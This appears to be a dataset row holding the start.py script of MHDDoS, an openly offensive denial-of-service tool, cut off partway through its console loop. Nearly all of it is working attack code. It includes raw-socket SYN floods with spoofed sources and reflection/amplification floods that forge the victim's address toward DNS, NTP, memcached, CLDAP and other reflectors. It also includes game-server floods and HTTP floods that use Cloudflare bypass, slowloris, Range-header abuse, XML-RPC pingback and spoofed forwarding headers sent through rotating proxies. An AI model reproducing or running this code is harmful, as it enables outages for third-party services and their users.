source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
start.py | #!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import choice as randchoice
from random import randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: str | bytes = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=5s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error('Download Proxy Error: %s' %
(e.__str__() or e.__repr__()))
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
